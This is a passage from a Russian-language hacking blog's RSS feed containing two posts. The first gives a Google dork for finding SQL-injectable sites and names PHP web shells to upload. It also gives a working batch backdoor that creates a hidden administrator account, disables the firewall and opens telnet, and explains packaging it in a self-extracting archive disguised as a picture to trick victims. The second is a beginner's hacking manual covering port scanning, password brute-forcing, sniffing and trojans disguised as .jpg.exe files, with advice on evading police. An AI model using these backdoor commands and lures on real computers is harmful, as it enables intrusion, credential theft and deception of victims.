То есть залить на сервер шелл.( спец php скрипт дающий полный доступ к серверу и хостингу в общем, тое есть если на сервере находиться не один сайт а 50 – 100 то с его помощью можно получить доступ к редактированию всех сайтов и управлении операционной системы сервера) на пример r57shell или c99madshell.<br />
Найти подобную уязвимость на сайтах не трудно нужно всего лишь ввести в google.com<br />
запрос: inurl:news.php?id=5 site:kz Warning: mysql<br />
По запросу выйдет очень много уязвимых сайтов находящихся в Казахстане.<br />
Взлом компьютера.<br />
Есть очень много способов, но я расскажу об универсальном, с его помощью можно будет получить полный доступ к компьютеру вплоть до подключения к рабочему столу.<br />
Для начала создается спец файл и который маскируется под архив и и методом соц. Инженерии “впаривается” через любой доступный метод на компьютер “жертвы”<br />
После того как архив закачен на компьютер и открыт запускается BAT файл который открывает доступ к компьютеру через telnet. Зная IP адрес уязвимой машины можно проникнуть в него и скачать любой файл. При этом вирусная опасность будет нулевая!<br />
Пример<br />
.bat файл<br />
chcp 1251<br />
net user coolz 12333 /add<br />
net localgroup Администраторы coolz /add<br />
net localgroup Administrators coolz /add<br />
net stop sharedaccess<br />
sc config tlntsvr start= auto<br />
tlntadmn config port=972 sec=-NTLM<br />
net start Telnet<br />
Создается отдельный пользователь в системе coolz и задается пароль 12333<br />
Далее присваиваются права администратора. И открывается порт 972.<br />
За тем выбираешь файл который нужно “впарить” пусть это будет картинка 1.jpg<br />
Выбирается картинка и пакуется в sfx архив, далее выделяете картинку (1.exe в архиве) и “батник” (1.bat)<br />
нажимаешь добавить в архив. Ставишь галку создать SFX архив потом нажимаешь во вкладку дополнительно и выбираешь пара<br />
метры SFX<br />
Путь для распаковки пишешь: %WinDir%temp<br />
В окошке выполнять после распаковки<br />
пишем наш архив с картинкой. 1.exe<br />
Заводим во вкладку режимы выбираем скрыть все нажимаем ок<br />
Теперь заходим во вкладку комментарий<br />
И где написано ввести комментарий вручную После строчки SavePath добавляем Setup=cool.bat<br />
Внешний вид<br />
Path=%WinDir%temp<br />
SavePath<br />
Setup=cool.bat<br />
Setup=1.exe<br />
Silent=1<br />
Нажимаем ОК<br />
Все замаскированный архив с батником готов<br />
То есть после того как открывается архив выполняется бат файл за тем открывается картинка<br />
После подключения к компьютеру можно открыть доступ к удаленному управлению<br />
Для этого в командной строке вводятся следующие параметры<br />
chcp 1251<br />
net localgroup Пользователи удаленного рабочего стола coolz /add<br />
net accounts /maxpwage:unlimited<br />
REG ADD &#171;HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserList&#187; /v &#171;coolz&#187; /t REG_DWORD /d 0 /f<br />
net stop sharedaccess<br />
sc config sharedaccess start= disabled<br />
sc config tlntsvr start= auto<br />
Все доступ открыт. Подключаемся к компьютеру с помощью Подключение к удаленному рабочему столу.<br />
Водим логин пароль и всё. Загружается рабочий стол уязвимой машины. В дальнейшем можно загрузить сниффер и узнать все пароли. (ICQ, mail адрес и. т. д.)</p>
<p>О взломе ящика скажу коротко.<br />
Есть 3 способа взлома:<br />
1й перебор пароля по словарю<br />
2й использование XSS уязвимости<br />
3й соц.инженерия</p>
Файл 7f5ddbf668be432bbaf47f6ed1d47c4b/sape.php не найден!]]></content:encoded>
			<wfw:commentRss>http://suspended.ru/2010/05/%d0%bd%d0%b0%d0%b7%d0%b2%d0%b0%d0%bd%d0%b8%d0%b5-121/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Полный мануал по взлому</title>
		<link>http://suspended.ru/2010/05/%d0%bd%d0%b0%d0%b7%d0%b2%d0%b0%d0%bd%d0%b8%d0%b5-123/</link>
		<comments>http://suspended.ru/2010/05/%d0%bd%d0%b0%d0%b7%d0%b2%d0%b0%d0%bd%d0%b8%d0%b5-123/#comments</comments>
		<pubDate>Thu, 13 May 2010 05:04:40 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
				<category><![CDATA[Взлом сайтов и программ]]></category>
		<category><![CDATA[взлом]]></category>
		<category><![CDATA[обман]]></category>
		<category><![CDATA[пароль]]></category>
		<category><![CDATA[хакер]]></category>

		<guid isPermaLink="false">http://suspended.ru/?p=423</guid>
		<description><![CDATA[конецформыначалоформыТы уже много раз читал на страницах Х реальные примеры того, как проводились разные взломы серваков. Все это мы старались преподнести в самых мельчайших и интимных подробностях. Но мне очень часто пишут, что мы даем только готовые решения, которые очень часто уже не работают к моменту выхода журнала в свет. Сегодня никаких готовых решений не [&#8230;]]]></description>
				<content:encoded><![CDATA[<p style="text-align: justify;"><img class="alignleft size-full wp-image-76" style="margin: 10px;" title="internet" src="http://suspended.ru/wp-content/uploads/2010/05/internet123.jpg" alt="интернет" />конецформыначалоформыТы уже много раз читал на страницах Х реальные примеры того, как проводились разные взломы серваков. Все это мы старались преподнести в самых мельчайших и интимных подробностях. Но мне очень часто пишут, что мы даем только готовые решения, которые очень часто уже не работают к моменту выхода журнала в свет. Сегодня никаких готовых решений не будет. Тебе предстоит познакомиться с теорией взлома.<br />
Лично я никогда не взламывал сайты в инете, потому что меня просто не удовлетворяет вандализм. Но зачем же тогда мне такие познания? Просто я увлекаюсь защитой систем, а самый лучший админ &#8212; это хакер. Точно так же можно сказать, что самый лучший хакер &#8212; это злой админ :).<span id="more-423"></span><br />
Я написал эту статью в надежде, что она будет восприниматься как руководство по защите твоей собственности. Я пишу этот текст только в познавательных целях. Помни, что взлом не украшает человека и не ставит тебя автоматически в ряды элиты, хотя и таким образом тоже попадают в наши ряды. Я так же считаю своим долгом напомнить тебе про существование УК, в котором предусмотрены нехилые наказания за информационный вандализм.<br />
Приступим:<br />
Допустим, что у тебя есть какой-то сервер, который ты хочешь взломать или протестировать на защищенность от взлома. С чего нужно начинать? Что сделать в первую очередь? Сразу очень много вопросов и ни одного ответа.<br />
Четкой последовательности действий нет. Взлом &#8212; это творческий процесс, а значит, и подходить к нему приходиться творчески. Нет определенных правил и нельзя все подвести под один шаблон. Зато есть несколько рекомендаций, которых желательно придерживаться.<br />
Приступим:<br />
Самое первое, с чего начинается взлом или тест системы на дырявость &#8212; сканирование портов. Для чего? А для того, чтобы узнать, какие сервисы/демоны установлены в системе. Каждый открытый порт &#8212; это сервисная программа установленная на сервере, к которой можно подключиться и выполнить определенные действия. Например, на 21-м порту висит FTP сервис. Если ты сможешь к нему подключиться, то тебе станет доступной возможность скачивания и закачивания на сервер файлов. Но это только если ты будешь обладать соответствующими правами.<br />
Первое, что нужно просканировать &#8212; первые 1024 порта. Среди них очень много стандартных сервисов типа FTP, HTTP, Telnet и т.д. Все открытие порты &#8212; это дверь с замочком для входа на сервер. Чем больше таких дверей, тем больше вероятность, что какой-то замок не выдержит натиска и откроется.<br />
У хорошего админа открыты только самые необходимые порты. Например, если это WEB-сервер не предоставляющий доступ к почте, то нет смысла держать сервисы почтовых серверов.<br />
Хороший сканер портов не только говорит номер открытого порта, но и показывает название установленного на нем сервиса. Желательно, чтобы сканер умел сохранять результат своей работы в каком-нибудь файле. Если этой возможности нет, то придется переписать все вручную и положить на видное место. В дальнейшем тебе пригодиться каждая строчка твоих записей.<br />
После этого можешь сканировать порты свыше 1024. Здесь стандартные сервисы встречаются редко. Зачем же тогда сканировать? А вдруг кто-то до тебя уже побывал здесь и оставил открытую дверку или протроянил сервак. Большинство троянов держат открытыми порты свыше 1024, поэтому если ты админ и нашел открытый порт с номером больше 1024, необходимо сразу насторожиться. Ну а если ты взломщик, то необходимо узнать имя трояна и найти для него клиентскую часть. На этом взлом может закончиться, потому что ты уже получил полный доступ к серваку без особых усилий :).<br />
Определяем ОС:<br />
Теперь мы знаем, какие двери у сервера открыты и чем мы можем воспользоваться. Но этого мало, потому что мы знаем какие есть двери, но не знаем, как их открыть.<br />
Сканирование &#8212; это всего лишь самый начальный этап, который тебе еще ничего особенного не сказал. Самое главное перед взломом &#8212; определить, какая ОС стоит на серваке. Желательно знать и версию, но это удается не всегда, да и на первых парах изучения системы можно обойтись без конкретизации.<br />
Для определения версии я могу посоветовать Shadow Scan. Не могу сказать, что она лучшая, но и к разряду худших отнести ее не имею права.<br />
Помимо определения ОС, прога умеет определять версии установленных сервисов. Это тебе может очень сильно помочь. Допустим, что ты узнал, что на серваке установлен WEB-сервер. Ты даже узнал, что ОС именует себя как &#171;Окошки&#187;. Ты можешь предположить, что WEB-сервер именует себя как IIS, но это предположение может тебя обмануть. Для окошек есть реализация сильнейшего сервера Apache. А так как взлом разных серверов производиться по разному, то тебя должно в первую очередь волновать, кто именно сидит на 80-м порту &#8212; IIS или Apache.<br />
Единственный недостаток Shadow Scan &#8212; именно при определении версии ОС некоторые релизы Shadow Scan вылетали в синий экран. Но в последней версии этот баг вроде исправлен.<br />
Адрес этой распрекрасной тулзы ты можешь найти во врезке &#171;Download&#187;.<br />
Юзаем порты :<br />
Итак, теперь ты знаешь, какая на сервере установлена ОС, какие порты открыты, и какие именно серверы висят на этих портах. Вся эта инфа должна быть у тебя записана в удобном для восприятия виде, хоть в файле, хоть на бумаге.<br />
Не ленись всю собранную инфу записывать и собирать в одну кучу. Помни, что даже компьютерные мозги иногда дают сбои, а человеческие делают это регулярно. Самое интересное, что чаще всего забывается самое необходимое. Ну а после взлома не поленись уничтожить, иначе ты облегчишь работу нашей доблестной милиции.<br />
Все записал? Ну, на этом можно остановить взлом. У тебя есть достаточно инфы для простейшего взлома по уже пройденным другими хаксорами следам. Просто посещай регулярно www.securityfocus.com. Здесь ты должен поискать информацию о дырявости установленных на серванте жертвы сервисов и самой ОС. Уже давно известно, что большая часть серверов (по некоторым данным 70%, а по некоторым 90%) в инете просто не латаются. Поэтому проверь все найденные эксплоиты на жертве, возможно, что-то подойдет.<br />
Если сервер хорошо залатан, то придется ждать появления новых дыр и експлоитов к установленным на сервере сервисам. Как только увидишь что-нибудь интересное, сразу качай експлоит и юзай свежую дырку, пока админ ее не залатал.<br />
Тестирование безопасности :<br />
Практически каждый день специалисты по безопасности находят в разных системах недочеты и откровенно говоря дыры или даже пробоины в системе безопасности. Все эти пробоины выкладываются в отчетах BugTraq на разных серверах. Я тебе уже посоветовал посещать www.securityfocus.com, чтобы следить за новостями, и сейчас не отказываюсь от своих слов. Новинки действительно надо смотреть на этом сервере, но ведь есть еще ворох старых дыр, которые могли быть, и не залатаны на сервере. Как же поступить с ними? Не ужели придется качать все эксплоиты и ручками проверять каждую пробоину? Ну конечно же нет. Существует громадное количество прог для автоматизации тестирования сервера на залатанность.<br />
Ты думаешь я должен посоветовать тебе какую-нибудь определенную прогу? Нет, я этого делать не буду, потому что все программы хороши. Не существует такой тулзы, в которой была бы база абсолютно всех потенциальных дыр. Поэтому качай все, что попадется под руку. Возможно что-то тебе и пригодиться.<br />
Взлом WWW-серванта :<br />
При взломе WWW-серванта есть свои особенности. Если на сервере крутятся CGI страницы, то взлом такого серванта нужно начинать совершенно по-другому. Для начала нужно просканировать его на наличие дырявых CGI скриптов. Ты не поверишь, но опять же по исследованиям крутых дядек, в инете громадное количество скриптов дырявые.<br />
Дырявость скриптов связана с тем, что для кодинга страничек используется Perl. Я ничего не имею против этого языка, но он сейчас достиг уровня универсала. На нем можно делать практически все, а не только форматировать текст. Поэтому в Perl очень много потенциально опасных функций. Но это не так страшно. Страшнее, когда ты можешь этим функциям передавать свои данные, когда скрипты не проверяют введенную пользователем инфу, а в чистом виде передают параметры в опасные функции.<br />
Другие языки (PHP, ASP и др) тоже имеют потенциально опасные функции, просто там их или поменьше, или они имеют дополнительную защиту. Единственный более менее защищенный язык &#8212; Java, который очень сильно тормозит систему, из-за чего его не охотно используют WEB-мастера.<br />
Я не собираюсь тебя лечить карявостью языков кодинга, потому что главная корявость &#8212; руки программера. Из-за громадной нехватки спецов в нашей любимой области, кодингом стали заниматься все кому не лень. Многие программеры самоучки даже не пытаются задуматься о безопасности. А тебе это только на руку.<br />
И так, твоя главная задача &#8212; запастись парочкой хороших CGI-сканеров. Какой лучше? Ответ однозначный &#8212; ВСЕ. Даже в самом плохом сканере может оказаться инфа о такой уязвимости, о которой не известно даже самому крутому. А главное, что по закону подлости именно эта уязвимость окажется доступной на серваке. Мы очень много упоминали о разных сканерах на страницах журнала, и каждый хвалил свой вариант. Я советую тебе взять подшивку Х и скачать все сканеры, упоминавшиеся на наших страницах.<br />
Серп и молот :<br />
Там где не возможно взломать сервер с помощью мозгов, всегда можно воспользоваться чисто русским методом &#8212; серпом и молотом. Это не значит, что серп нужно представлять к горлу админа, а молотком стучать по макушке. Просто всегда можно воспользоваться тупым подбором паролей.<br />
Давай снова обратимся к статистике. Все исследовательские конторы пришли к одному и тому же выводу, что большинство ушастых выбирают в качестве пароля имена своих любимых собачек, кошечек, даты рождения или номера телефонов. Так что хорошо подобранный словарь может сломать практически любую систему, потому что везде есть ламеры.<br />
Ты до сих пор еще не веришь мне? Давай вспомним знаменитейший червь Морриса, который проникал в систему, взламывая ее по словарю. Словарь был достаточно маленький и состоял менее чем из ста слов. Помимо этого, червь использовал в переборе слова из словаря установленного в системе. Там тоже слов не так уж много. И вот благодаря такому примитивному алгоритму, червь смог поразить громаднейшее число компов и серваков. Это был один из самых массовых взломов!!!<br />
Взлом по словарю очень часто используется для взлома мыльников, FTP паролей и другой чешуи. Но прежде чем приступать к такому взлому, советую хорошо отредактировать словари имен и паролей. Очень важно знать, какую систему ты взламываешь. Например, если это оконный сервер, то желательно, чтобы среди логинов был &#171;Администратор&#187;. Ну а если это *nix система, то обязательно должен присутствовать &#171;root&#187;, а все логины типа &#171;Администратор&#187; можно послать куда подальше.<br />
Неплохо было бы вставить в словарь любые имена и пароли используемые по умолчанию для разных сервисов. Очень часто админы забывают или просто ленятся поменять пароли на сервисы, которые запущены, но они ими не пользуются. Эта лень очень часто проявляется у админов окошек и это связано с тем, что в окошках уровень знаний спецов намного ниже. Например, я очень много встречал MS SQL Server 7.0 c логином по умолчанию в &#171;sa&#187; и абсолютно без пароля. Наверно поэтому M$ собирается убрать этот логин уже в следующей версии своего сервера баз данных.<br />
Для тупого перебора я опять могу посоветовать Shadow Scan (ну люблю я эту тулзу, что тут поделаешь). В нем есть очень хороший генератор словарей и реализованы подборщики по всем основным протоколам.<br />
Взлом локалки :<br />
В локалке есть свои особенности. Например, если она построена на основе коаксиала или витой пары соединенной через хабы, то весь сетевой трафик обязательно проходит через твою машину. Почему же ты его не видишь? Просто ОС и сетевуха сговорились и не показывает тебе чужой трафик. Но если очень сильно захотеть, то можно воспользовавшись снифером пронюхать все данные проходящие мимо твоей сетевой карточки.<br />
Сейчас в сети можно скачать громадное количество сниферов и примочек к ним. Я опять не буду советовать тебе что-то конкретное, потому что лично я не могу выделить однозначного лидера среди сниферов.<br />
Разные версии заточены под разные нужды, и тут нужно выбирать именно из этого соображения. Если ты конкретно ищешь пароли, то тебе нужен тот, что умеет выделять информацию о регистрации из общего трафика сети.<br />
Троянус :<br />
Самый тупой и самый ненадежный в отношении админов способ. Хотя админы и бывают ламерами, но на такие шутки уже никто не катит. Но кто сказал, что в сетке существуют только админы? Есть еще куча ламеров с большими привилегиями и маленькими мозгами. Вот именно их и надо троянить.<br />
Как забрасывать троян? Самый распространенный способ &#8212; почтовый ящик. Просто даешь трояну какое-нибудь заманчивое имя и отправляешь письмо жертве. Если он запустит твой трой, то считай, что ты царь и бог на его компе. Теперь тебе будет доступно все, что может для тебя сделать твой боевой конь.<br />
Какое дать имя, чтобы заинтересовать ламера? Очень просто, окна очень часто прячут расширения всех зарегистрированных в системе типов файлов. В этом случае, если ты назовешь файл как Anna_Kurnikova.jpg.exe, окна спрячут последнее расширение и любой лам подумает, что видит картинку. Для большей надежности, файл лучше всего назвать даже так: Anna_Kurnikova.jpg&#8230;&#8230;&#8230;..exe. В этом случае, если даже расширение не прячется по умолчанию, его все равно видно не будет.<br />
Любое письмо с трояном желательно снабдить хорошим текстом, чтобы заинтересовать чела запустить находящийся в нем файл.<br />
Итог :<br />
Эта статья не претендует на полноту, но я постарался дать все необходимые начальные сведения. Просто нас очень часто упрекают, что мы забываем про начинающих, и очень часто грузят вопросами типа: &#171;Как взломать сервант?&#187;. Теперь ты сможешь залезть в танк и катиться дальше вместе с нами.<br />
Я заведомо не затрагивал тему получения халявного инета, потому что тут очень много своих особенностей. Но один из возможных способов я все же описал &#8212; трояны. Вообще, этот способ практически универсальный и может использоваться везде.<br />
Я так же надеюсь, что продвинутые челы тоже смогли найти для себя нечто интересное или новое. Покедова, надеюсь еще увидимся.<br />
Дополнительная инфа :<br />
www.cert.ru &#8212; хороший сервант по известным дырам. Радует, что он на русском, а огорчает редкость обновления и не все дыры описываются.<br />
www.cert.org &#8212; то же самое, что и предыдущее, только на английском языке.<br />
www.securityfocus.com &#8212; это я тебе уже рекомендовал, поэтому просто напоминаю.<br />
www.void.ru -отличный сервант на русском языке. Можешь сделать его стартовой страницей.<br />
Не верь глазам своим! :<br />
Сейчас мы поговорим о том, как различные проги определяет семейство ОС установленной на серваке. Для этого есть несколько способов:<br />
1. По реализации протокола TCP/IP. Разные корпорашки по разному реализуют стек протоколов в своих ОС. Программа просто анализирует ответы на запросы от сервера и делает вывод об установленной ОС. В основном этот вывод расплывчатый типа Windows или Linux. Точную версию таким образом сказать невозможно.<br />
Допустим, что прога сказала, что на серваке установлен Linux, но какой именно дистрибутив тебе никто не скажет. А ведь дыры в разных дистрибутивах разные и поэтому такая инфа &#8212; это только половина необходимого тебе для взлома сервера.<br />
2. По ответам разных сервисов. Допустим, что на сервере жертвы есть анонимный доступ по FTP. Тебе нужно всего лишь присоединиться к нему и посмотреть сообщение приглашения в систему. По умолчанию, в качестве приглашения используется надпись типа &#171;Добро пожаловать на сервер FreeBSD4.0 версия FTP клиента Х.ХХХ&#187;. Если ты такое увидел, то можно и радоваться и плакать, потому что это может быть и правдой.<br />
Если надпись приглашения отражает действительность, то админ &#8212; лох со стажем. Нормальный админ всегда изменяет приглашение по умолчанию. А вот хороший админ может написать и ложное сообщение. Например, на сервере с Windows 4.0 можно увидеть приглашение в Linux. В этом случае можно безуспешно потратить очень много времени в попытках сломать окна через дыры Linux. Поэтому не особо доверяй надписям и старайся перепроверить любыми другими способами.<br />
3. Социальная инженерия. Если ты хочешь взломать сервант хостинговой компании, то можно отправить письмо админу с запросом об установленных у него серверах. В основном админы или служба поддержки не скрывают эту инфу, но бывают случаи и вранья. Возможно, что эта инфа будет лежать даже на главной странице сервера, но даже это следует проверить.<br />
Чтобы тебя не надули, обязательно обращай внимания на используемые на сервере сервисы, например, в Linux врят ли будут крутиться страницы созданные по технологии ASP.<br />
www.Download.hack :<br />
В этой врезке я постараюсь дать тебе список всех программ, которые тебе понадобятся при тестировании системы на дырявость.<br />
CyD NET Utils &#8212; всегда можно скачать с моего сайта www.cydsoft.com/vr-online. Я эту программу писал не для взлома а для тестирования локальных сетей на работоспособность и безопасность. Так что если ты админ, то желательно иметь эту прогу в своем арсенале. В CyD NET Utils присутствует удобный сканер портов, пингер, WhoIs и многое другое. Результат работы можно всегда можно сохранить файл или распечатать.<br />
Shadow Scan (http://www.rsh.kiev.ua/) &#8212; отличная прога с большим количеством возможностей для тестирования системы на вшивость. Что-то говорит мне, что написана нашими братьями по разуму из ближней Украины.<br />
NT Crack (http://archivedaru.hypermart.net/winnt_hacking/Ntcrack.zip) &#8212; прога проверки NT на вшивость. Если ты хочешь взломать оконный сервер, то эта прога должна быть в твоем арсенале. Ну а если хочешь защитить NT, то тем более.<br />
NT Bugs (hhttp://archivedaru.hypermart.net/winnt_hacking/Ntbugs.zip) &#8212; достаточно приличного размера описание багов оконного сервера. Если ты владеешь буржуйским языком, то просто обязан иметь ее в своем арсенале.<br />
LC3 (http://www.l0pht.com/l0phtcrack/dist/lc252install.zip) &#8212; самый знаменитый и крутейший подборщик паролей для NT.<br />
Retina Network Security Scanner (http://www.eeye.com/) &#8212; хороший сканер безопасности. Вот не знаю я, и за что я в него такой влюбленный :)?<br />
Короткий словарик :<br />
Демон &#8212; серверная программа, которая работает в фоне и предназначена для выполнения каких-либо действий. Этот термин применяется в *nix средах. Там названия таких прог в основном отличаются тем, что в конце имени стоит буква &#171;d&#187;.<br />
Представим себе демон WEB сервера. Это должна быть прога, которая висит в памяти и ждет подключения на 80-й порт (это по умолчанию). Как только кто-то подсоединился, демон начинает принимать запросы и отвечать на них. Но демоны бывают не только сетевые, потому к сетевым, например, невозможно отнести демон печати.<br />
Сервисы &#8212; это то же самое, что и демоны, только так называют те же проги в окошках.<br />
Експлоит &#8212; прога, которая умеет пользоваться какой-нибудь уязвимостью сервака. Если он написан под *nix, то может поставляться в исходных кодах. В этом случае, перед использованием потребуеться компиляция.<br />
Порт &#8212; Каждая сетевая программа при старте открывает для себя любой свободный порт. Есть и зарезервированные типа FTP это 21-й порт, HTTP это 80 порт и т. д. Теперь представим ситуацию, что на сервере запущено два сервиса: FTP и WEB. Это значит, что на сервере работает две программы, к которым можно коннектиться. Теперь ты хочешь присоединиться к FTP серверу и посылаешь запрос по адресу ХХХ.ХХХ.ХХХ.ХХХ и на порт 21. Сервер получает такой запрос и по номеру порта определяет, что твой запрос относиться именно к FTP серверу, а не WEB.<br />
Так что сетевые порты &#8212; это что-то виртуальное, что увидеть невозможно. Если бы не было портов, то комп не смог бы определить для кого именно пришел твой запрос.</p>
Файл 7f5ddbf668be432bbaf47f6ed1d47c4b/sape.php не найден!]]></content:encoded>
			<wfw:commentRss>http://suspended.ru/2010/05/%d0%bd%d0%b0%d0%b7%d0%b2%d0%b0%d0%bd%d0%b8%d0%b5-123/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
